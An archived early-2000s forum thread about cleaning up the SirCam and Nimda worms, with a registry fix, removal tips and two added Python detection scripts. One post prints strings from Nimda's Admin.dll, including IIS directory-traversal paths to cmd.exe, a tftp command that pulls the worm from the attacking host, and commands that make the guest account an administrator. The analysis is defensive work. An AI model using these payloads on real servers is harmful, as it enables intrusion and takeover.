Nimda Virus/SirCam Variants - A How-to if you will...


SpeeDj
09-26-01, 10:18 PM
Recently my entire home network came down with this virus, and having been one to ride the wind without an anti-virus program, I have never felt the need in nine years. Now I am running an anti-virus. This little culprit is a nasty one: it infects and spreads its way across your computer. Not only that, but it takes over your filetype for .EXE files, making it run them by using SirC32.EXE. What follows are the steps to take to rid yourself of this virus. I have to thank a very close and personal friend; without his patience I would have never discovered a workaround for the exe issue. In addition I need to thank Shadow and Skip as well for their prompt replies and the help they have offered.

First thing you are going to need to do is download an anti-virus program, because if you are reading this you were probably like me and did not have one. Next thing is to install it. I chose Norton because McAfee has had more than its fair share of problems as of late; it's really up to you what to pick. Run all the options, i.e. Scan at startup, etc. Make sure to run the updates and get the latest definitions.

Now follow the next set of instructions, for once you have either found and repaired or quarantined and deleted the virus, you will need to restore the filetype association for EXE; as you may have noticed, the EXE filetype is the only association you can not edit.


Here is the workaround, guys, so if you happen to get it this is what you have to do. Again, because you cannot reassign the EXE to anything, this is the only filetype that cannot be edited. This only applies to Win9x/Me type systems.

Open an MS-DOS window and make sure you are in the C:\Windows dir.

Type at the command prompt,

Copy regedit.exe regedit.com (since it is impossible to run executables)

Now type regedit, your regedit window should open, do a find for the file SirC32

It should find it in exefile/support/etc....

The tag should read Default and be referenced to SirC32.exe (something such as "C:\recycled\SirC32.EXE"). Double click the tag on the right that states Default and change it to the following.

"%1" %*

Then click exit and you should once again be able to run exe's =)

After doing this delete your newly made regedit.com file =)

Hope this helps! One more thing you may need is the following: SirC likes to infect your C:\Windows\rundll32.exe file, and no matter what you do it seemingly is impossible to repair the file, so make sure you have a friend or confidant with a "CLEAN" rundll32.exe file and place it into your Windows dir, reboot, and all should be well.

J
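As an added example (not part of the original post), here is a small Python check for the hijacked association described above: it reads a .reg export of HKEY_CLASSES_ROOT\exefile\shell\open\command (for instance from regedit /e) and flags a default value that runs anything before "%1". The export text in the block is constructed for the example.

```python
"""Flag a hijacked EXE association in a Windows .reg export.

Added example, not from the original post. The key SirCam rewrites is
HKEY_CLASSES_ROOT\\exefile\\shell\\open\\command; its clean default is
  "%1" %*
(run the target .exe, pass the arguments through). The export text below is
constructed for the example, not taken from a real machine.
"""
import re

EXEFILE_KEY = r"hkey_classes_root\exefile\shell\open\command"
CLEAN_COMMAND = '"%1" %*'

# Constructed sample of what `regedit /e` writes out for the hijacked key.
SAMPLE_REG = r'''REGEDIT4

[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="\"C:\\recycled\\SirC32.EXE\" \"%1\" %*"

[HKEY_CLASSES_ROOT\txtfile\shell\open\command]
@="C:\\WINDOWS\\NOTEPAD.EXE %1"
'''


def _unescape(value: str) -> str:
    """Undo .reg escaping: a backslash placed before a backslash or a quote is removed."""
    return re.sub(r'\\(["\\])', r'\1', value)


def parse_reg(text: str) -> dict:
    """Map each [key] (lower-cased) to its unescaped default (@) string value."""
    defaults, key = {}, None
    for line in text.splitlines():
        line = line.strip()
        m = re.fullmatch(r'\[(.+)\]', line)
        if m:
            key = m.group(1).lower()
        elif key and line.startswith('@="') and line.endswith('"'):
            defaults[key] = _unescape(line[3:-1])
    return defaults


def check_exefile(text: str) -> tuple:
    """Return (hijacked, command) for the exefile open command in the export.

    Anything placed before "%1" means another program runs first, which is
    exactly the SirC32.EXE interposition the post describes.
    """
    cmd = parse_reg(text).get(EXEFILE_KEY)
    if cmd is None:
        return (False, None)
    hijacked = cmd != CLEAN_COMMAND and not cmd.startswith('"%1"')
    return (hijacked, cmd)


if __name__ == "__main__":
    hijacked, cmd = check_exefile(SAMPLE_REG)
    print("HIJACKED" if hijacked else "clean", "->", cmd)
```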

RedDeathDrinker
09-27-01, 09:22 AM
Many Thanks - has been noted and printed off, and a clean Rundll32.exe burned on a CD just in case.......

I would like to bags first in line to torture the idiots who write these viruses........

Amedeo602
09-28-01, 10:48 AM
Always have anti-virus software!

Even if you can't afford one, go to www.antivirus.com and use the FREE, web-based scanner from Trend (I use the home version myself and it's great).

UnseenMenace
09-28-01, 01:10 PM
Don't forget, if you use Windows ME, to empty the System Restore folder as well, as viruses can be backed up by this utility.

Paiynn
10-02-01, 12:30 AM
Trend dominates the anti-virus market IMO. I use ScanMail for Exchange, ServerProtect for the servers and OfficeScan Corporate for the clients in my network. OfficeScan is so sweet for a LAN; it automatically removes any other scanner installed, saving you a step. Its installation can be done through the web, providing you run a web server. Every setting within the clients is managed centrally; the program can't be removed or unloaded by the end users. You can invoke a system-wide scan of all PCs that the user can do nothing about. The control server checks for new patterns and engine updates etc. every hour, and if it does find one it is automatically pushed to all clients. You can also roll back to a previous pattern if necessary. All admin is web based and it's full of reporting features. Did I mention I like it? :)

Oni
10-03-01, 02:52 AM
Originally posted by reddeathdrinker

I would like to bags first in line to torture the idiots who write these viruses........

I'd just bludgeon them to death w/ their own keyboards. That'd teach em! Kinda poetic-justice like.

UnseenMenace
10-03-01, 11:24 AM
More Information on the virus

The worm sends E-mail to the following mail servers:
========================================

From w1re p4ir: Admin.dll (strings ./Admin.dll)
========================================

When running strings against Admin.dll, here is what has been concluded.
I'm sure some of this might be totally off but it is what we think it's attempting to do:
First it was noticed it was setting up:
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China

It then shows the mime headers and the content type:
Content-Type: audio/x-wav;
name="readme.exe"

This is obviously part of the readme.eml. Next we see it making some changes or reading of the registry:

[rename]
\wininit.ini
Personal
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
\*.*
EXPLORER
fsdhqherwqi2001
SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security
share c$=c:\

It also seems to add the user "guest" to the Administrator group.

user guest ""
localgroup Administrators guest /add
localgroup Guests guest /add
user guest /active
open
user guest /add

After this we notice the binary directories and unicode character sets to be used in compromising the other hosts.

/root.exe?/c+
/winnt/system32/cmd.exe?/c+
net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
Admin.dll
c:\Admin.dll
d:\Admin.dll
e:\Admin.dll

This is an interesting part: it must be net using to the local machine (maybe) with the user guest (who is now an administrator) and tftping the Admin.dll and putting it in the current directory and all drive roots C:, D: etc.


<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>
/Admin.dll

Here's where it inserts the javascript to open the evil readme.eml mime Buffer overflow.


This I'm not too sure of what it's trying to do. I imagine it's setting up the email information:
QUIT
Subject:
From: <
DATA
RCPT TO: <
MAIL FROM: <
HELO
aabbcc
-dontrunold
NULL
\readme*.exe
admin.dll
qusery9bnow
-qusery9bnow
\mmc.exe
\riched20.dll
boot
Shell
explorer.exe load.exe -dontrunold
\system.ini
\load.exe

========================================
Here is some of its content:

<quote>
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
....
NUL=
[rename]
\wininit.ini
Personal
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
\*.*
EXPLORER
fsdhqherwqi2001
SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security
share c$=c:\
user guest ""
localgroup Administrators guest /add
localgroup Guests guest /add
user guest /active
open
user guest /add
HideFileExt
ShowSuperHidden
Hidden
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
...
software\microsoft\windows nt\currentversion\perflib
/scripts
/MSADC
/scripts/..%255c..
/_vti_bin/..%255c../..%255c../..%255c..
/_mem_bin/..%255c../..%255c../..%255c..
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
/scripts/..%c1%1c..
/scripts/..%c0%2f..
/scripts/..%c0%af..
/scripts/..%c1%9c..
/scripts/..%%35%63..
/scripts/..%%35c..
/scripts/..%25%35%63..
/scripts/..%252f..
/root.exe?/c+
/winnt/system32/cmd.exe?/c+
net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
Admin.dll
c:\Admin.dll
d:\Admin.dll
e:\Admin.dll
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>
/Admin.dll
GET %s HTTP/1.0
Host: www
Connnection: close
readme
main
index
default
html
.asp
.htm
\readme.eml
.exe
winzip32.exe
riched20.dll
.nws
.eml
.doc
.exe
...
SYSTEM\CurrentControlSet\Services\lanmanserver\Shares
Cache
Software\Microsoft\Windows\CurrentVersion\Explorer\MapMail
QUIT
Subject:
From: <
DATA
RCPT TO: <
MAIL FROM: <
HELO
aabbcc
-dontrunold
NULL
\readme*.exe
admin.dll
qusery9bnow
-qusery9bnow
\mmc.exe
\riched20.dll
boot
Shell
explorer.exe load.exe -dontrunold
\system.ini
\load.exe
....
</quote>
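As an added example, not part of the original post or of the strings analysis above, here is a Python scan over IIS W3C log lines for the probe strings quoted above (the encoded traversal sequences, the root.exe and cmd.exe requests, and the tftp fetch of Admin.dll), the check to run on a web server that shows cmd.exe requests in its scripts folder. The log lines in the block are constructed for the example.

```python
"""Scan IIS W3C extended log lines for the Nimda probe strings quoted above.

Added example, not from the original post. The log lines are constructed
for the example; fields follow the layout the #Fields header names.
"""
import re
from collections import Counter

# Encoded "..\" and "../" forms used to walk out of /scripts, /msadc, /_vti_bin.
TRAVERSAL = re.compile(
    r"\.\.(%255c|%25%35%63|%%35%63|%%35c|%252f|%c1%1c|%c0%2f|%c0%af|%c1%9c|%5c|%2f)",
    re.I)
# Command execution via the old root.exe backdoor or the traversed cmd.exe.
SHELL = re.compile(r"/(root\.exe|cmd\.exe)$", re.I)
# The follow-up request that pulls the worm body onto the server.
FETCH = re.compile(r"tftp.*admin\.dll", re.I)

SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-09-18 10:01:02 192.0.2.10 GET /scripts/root.exe /c+dir 404
2001-09-18 10:01:03 192.0.2.10 GET /MSADC/root.exe /c+dir 404
2001-09-18 10:01:04 192.0.2.10 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 200
2001-09-18 10:01:05 192.0.2.10 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+tftp%20-i%20192.0.2.10%20GET%20Admin.dll 200
2001-09-18 10:02:00 198.51.100.7 GET /default.htm - 200
2001-09-18 10:02:01 198.51.100.7 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 404
"""

def classify(uri_stem: str, uri_query: str) -> list:
    """Return the Nimda indicators present in one request (empty if none)."""
    hits = []
    if TRAVERSAL.search(uri_stem):
        hits.append("traversal")
    if SHELL.search(uri_stem):
        hits.append("shell")
    if FETCH.search(uri_query):
        hits.append("tftp-admin.dll")
    return hits

def scan_log(text: str) -> list:
    """Return (client_ip, uri, indicators, status) for every suspicious request.

    A 200 on a cmd.exe/root.exe request means the probe found an unpatched
    server; a 404 is the same worm knocking on a door that is closed.
    """
    findings = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 7:
            continue
        ip, stem, query, status = fields[2], fields[4], fields[5], fields[6]
        hits = classify(stem, query)
        if hits:
            findings.append((ip, stem + "?" + query, hits, status))
    return findings

def successful_probes(text: str) -> list:
    """Only the suspicious requests that got HTTP 200: investigate these first."""
    return [f for f in scan_log(text) if f[3] == "200"]

def probes_by_source(text: str) -> Counter:
    """Suspicious requests per client; Nimda sends bursts from each infected host."""
    return Counter(f[0] for f in scan_log(text))

if __name__ == "__main__":
    for ip, uri, hits, status in scan_log(SAMPLE_LOG):
        print(status, ip, ",".join(hits), uri)
```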

Balkoth
10-09-01, 07:19 AM
Here's a little something to help rid of SirC32:

Go to http://www.sarc.com/avcenter/FixSirc.com

It's a little executable that searches for and then destroys this annoying worm.

Then you need to extract rundll32.exe from the windows cabs -

"extract <path to cabs> win98_46.cab rundll32.exe <path to where you want it extracted>"

Copy rundll32.exe to c:\windows and overwrite it when prompted.

Reboot and run a virus scan. You should have no SirC32 anymore.

Note: if you're on a network, disconnect each machine so they are standalone. Also, check your autoexec.bat file - if it has ANYTHING relating to Sirc32.exe in it, remove those lines.

The above procedure worked for me on my 10 machine network (I work in an internet / multiplayer games cafe) and now I'm SirC free!

nihili
10-09-01, 08:18 AM
Nice thread guys. How about a little bit on how to tell if you have the virus. There are probably a bunch of us who use virus protection but are a bit nervous anyway.

For instance, I use Norton and update the files every Friday, but lately my network has been flaky. Can't tell if it's @home or something else. So, how do you know?

nihili

Balkoth
10-09-01, 08:32 AM
Check out http://www.symantec.com/avcenter/venc/data/w32.sircam.worm@mm.html for more information on SirC.

fuzzba11
10-14-01, 07:10 AM
Ok, I've had several files like readme.exe and other filenames that it seems to have 'stolen' from other computers and put in .exe form, such as mp3 filenames. But I'm not sure if I'm infected... I've scanned and quarantined several copies, but I'm not sure if I'm completely rid of it. If I try to delete it directly it kills explorer (in Win2k, not a big problem).

I can still run games and other exes...I just say that because it sounds as if a symptom of the worm is not being able to run any executables. Is that correct? I might set my systems to both do a full scan, overnight, and cut off full filesharing to any folders(where it seems to enter)

Balkoth
10-14-01, 07:43 AM
When I found SirC all executables still ran, but a little slower than normal.

To be safe I suggest you get the fix from the link in my post "A little something to help rid of SirC32".

The procedure shown in that post was used on a Win98 platform. Not sure if it'll work in Win2K...

Suggest you pull the network cable when cleaning each machine just to be safe.

Hope this helps...

Softwebdev
11-07-01, 06:50 PM
it's just another computer virus...if you have latest update from your antivirus software....problem can be solved

trapper
12-02-01, 05:59 PM
Remember, you dudez in the country of capitalists, that if it were not for the talented individuals who write viri then there would be no AV ppl, e.g. snortin Norton, McAfee, Kaspersky, Command, Trend etc. etc.

Mind you, viri are a bit mindless, but you have to admire the authors of some of the trojans, especially Sub7.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"i may not agree with what you say but i will defend your right to say it"--voltaire--

UnseenMenace
12-02-01, 06:10 PM
Originally posted by trapper
Remember, you dudez in the country of capitalists, that if it were not for the talented individuals who write viri then there would be no AV ppl, e.g. snortin Norton, McAfee, Kaspersky, Command, Trend etc. etc.

Mind you, viri are a bit mindless, but you have to admire the authors of some of the trojans, especially Sub7.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"i may not agree with what you say but i will defend your right to say it"--voltaire--


I would much rather say that if the 'morons' who write viruses ceased to do so there would be no need for any AV software, and the same can be said about Trojan writers. I do NOT personally believe that anyone who damages other people's property and affects people's lives is worthy of any kind of admiration. While I have respect for the skill of someone who understands protocols and programming enough to discover 'system flaws', I do fail to see what is obtained by exploiting these flaws on the average user's system. What is so different about trojans such as Sub7 for you to consider that they are any less mindless than viruses? Both were created by someone with the skill and understanding to create havoc, and both are usually used by morons with no more skill or understanding of computer systems than that required to operate ICQ.

el
12-03-01, 06:02 PM
Microsoft update for Outlook 2002 that will help protect you. Get it NOW!

http://office.microsoft.com/Downloads/2000/Out2ksec.aspx

trapper
12-11-01, 05:54 AM
Originally posted by Amedeo602
Always have anti-virus software!

Even if you can't afford one, go to www.antivirus.com and use the FREE, web-based scanner from Trend (I use the home version myself and it's great).

**This post has been edited by SpeeDj**
----------------------------------------------------------------------------------------------------------------------

Warez, Crackz, and Copyrighted material

This is to clarify the position of this site regarding Warez information and warez sites, Crackz and information about crackz, and the posting and downloading of copyrighted material.

Overclockers prohibits the promotion of, and reference to, any program or website which contains or distributes Warez, Crackz, and pirated copyrighted material, including but not limited to music and video.

Discussion of Warez, crackz, and pirated copyrighted material is not permitted in this forum. Any offer to provide or request to receive warez, crackz, and bootleg material will be deleted without notice and the offender will be warned. A repeat offense is grounds for permanent dismissal, without recourse, from these forums.

This is a serious issue for this Forum. Allowing discussion of and, by extension condoning the distribution of, said information jeopardizes the very existence of this Forum. As such, it will not be tolerated. For the long-term future of this site, please abide by this rule.

Thanks,

Overclockers.com Forum Management
----------------------------------------------------------------------------------------------------------------------

"FEED THE NEEDY NOT THE GREEDY"

WHO ATE ALL THE PIES??

Oni
12-16-01, 02:04 AM
I've found that this thread is mostly about SirCam, but not Nimda, as the title says.

As of right now, I have a Nimda infection, and I can't shake it. My Norton doesn't pick up anything during scans (and it is completely updated), and in my log files, I still see things trying to access cmd.exe (the win2000 command prompt) through my scripts folder (I turned scripting off, just in case). Is there any way I can clear this annoying virus off of my box for good, or do I need to format again? I hope not. I just got my system back in order from the last format I did.

jw50
03-06-02, 03:29 PM
There are a number of viruses/worms/trojans that cannot be removed by an anti-virus program alone. Any time you get any virus you should go to one of the anti-virus sites and check the removal instructions. SirCam and Nimda are both ones that require the use of a separate removal tool that you can download. Just make sure you follow the removal instructions exactly to ensure that the malicious code is completely removed from your system.

Tismedt
03-12-02, 08:54 PM
Wish I would have found this thread last week. I just finished formatting all 5 systems on my lan due to nimda. It was a lot of work but I am 100% sure it is gone. Also I never ran av before but I have one now. Lesson learned the hard way.

thralldad
04-07-02, 11:14 AM
Just got through recovering (hopefully) from a Nimda virus/trojan attack. I am using Inocutel and IE 5.5 has the latest security update. I got hooked to Roadrunner hi-speed a month ago. What do I need for a "firewall"??

Pardon in advance for this rookie question!!

THX;Paul C:

phillyTIM
05-02-02, 07:59 AM
nimba/sircam HOWTO?

1. fdisk your hard drive

2. install linux

3. forever cured!

Duster.
07-05-02, 04:38 AM
how did you catch this virus?

MEMex
07-08-02, 10:17 AM
Wow, now I can fix my computer instead of formatting it... :rolleyes:

I have (used to have) McAfee virus scanner, I upgraded it all the time, and a macro virus jumped into the McAfee file folder and infected everything. I could clean the computer but McAfee wouldn't delete or quarantine itself lol! The program had too much pride in itself...

If I have a virus on my computer, and I can't fix it without using the program and deleting manually... I just say forget it and format my hard drive(s) :D

plizzo
09-11-02, 06:34 PM
I'm glad this was a sticky, cause I just got this neat little virus on my network and have some work ahead of me tonight. I also found this (http://securityresponse.symantec.com/avcenter/venc/data/w32.nimda.a@mm.removal.tool.html) which I'm hoping will be helpful.
Thanks for all the tips.

Zigma
10-07-02, 12:56 AM
I just got OWNED by this little bugger... and I don't even know how I got it :(

http://zigma.mrwatermonkey.com/virus2.jpg

bubba gump
11-29-02, 01:14 PM
I was wondering, since UnseenMenace I think said that after you have a virus, empty your Windows restore folder..... which folder is it?

thanks

kagee108
12-19-02, 10:15 AM
Nimda.E is very wicked. Just got rid of that little sucker but my system still is not quite right, even though I did a repair install of Windows XP Pro.

For instance... I can no longer use the "fax" print option. Keeps telling me that the device is not connected. Have uninstalled this feature and reinstalled several times with no luck.

Do I or should I need to format and start over???

kutup
12-20-02, 11:13 AM
AVG6 Free It has caught what Norton & Mcafee miss ?

Zigma
02-03-03, 01:44 AM
I caught the sucker again!!!! Jesus... and there is a file called readme.exe which does not want to delete. I still have over 300 infected files out of 1377!! Need more info on how to remove. :-(

Mastametz
04-25-03, 05:37 PM
A family member of mine has the virus. I scanned for viruses, but when it found the viruses, it couldn't take any action. So I updated Norton..... then I scanned again.... it didn't find anything. What a pest.... every couple hours Norton will pop up about 50 times in a row, "VIRUS FOUND!" "VIRUS FOUND!"... always delete 'em but they won't go away.... nasty little bugger.... when we find who makes these darn things.... gonna tie 'em to a telephone pole and poke 'em with a stick until they die....

Lord_Zoltan
05-31-03, 02:17 PM
No offence, but your way isn't the greatest. Get a utility that just runs through DOS and kills all your .eml files, thusly Nimda; it will fix all your problems.

I have done your way, and well, I could tell just from reading it that it would not have the same effect, missing some stuff. Too lazy to write, but enjoy :)

I used a program called swnimda. If using XP you've got to use Task Manager and select New Task, then the path of it, i.e. c:\swnimda, then the drive, i.e. c:\swnimda c:

Pm if you really need it.

Doc_Skurlock
07-06-03, 02:10 AM
We here at the shop have found that Norton can find some viruses, but it gets disabled, handicapped, can't do anything about it. I installed AVG on a client's computer and it deleted and fixed his over 300 infected files, while Norton was left fluttering in the wind. AVG is better than McAfee, and Norton. You could get it for free, but now, it's a 30 day trial, and then you can purchase a home user. I will, it's worth it. Download it here, www.grisoft.com
Doc

Christoph
10-20-03, 02:03 AM
You are my new bestest friend. Thanks for the info.
Too bad that old ladies don't know how to keep viruses off their laptops. :rolleyes:

leggysoe
11-08-03, 06:58 PM
thx for information

st3reotype
01-13-04, 08:51 PM
This is probably old news, but if no one has noticed, well, nimda is admin backwards... something to ponder.

Lan_Of_Malkier
03-18-04, 03:44 PM
Hmm....

This is interesting. I am away on a business trip now, but when I get home I'm checking.

My Notepad disappeared. Gone, nothing. I had to grab it off one of the other comps on my home network. Wonder if this SirC is the culprit.